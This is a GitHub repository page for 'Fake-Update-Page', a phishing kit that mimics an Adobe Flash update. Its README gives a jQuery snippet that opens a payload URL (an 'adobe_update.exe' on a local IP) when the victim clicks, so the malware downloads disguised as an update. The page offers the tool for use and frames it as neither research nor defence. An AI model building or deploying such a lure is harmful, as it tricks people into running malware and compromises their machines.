Skip to content

Fake Update Website ( On Click Automatic Download Windows Payload )

License

Notifications You must be signed in to change notification settings

jaydeepnasit/Fake-Update-Page

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Fake-Update-Page

Fake Update Website ( On Click Automatic Download Windows Payload )

Set Payload URL:-

    $(document).ready(function (){

        $('#CF_OPEN').on('click', function(){

            var payload_url = "http://192.168.0.108/payload/adobe_update.exe";
            window.open(payload_url, '_blank');

        });

    });

##Preview :-

Fake-Adobe-Flash-Update

About

Fake Update Website ( On Click Automatic Download Windows Payload )

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages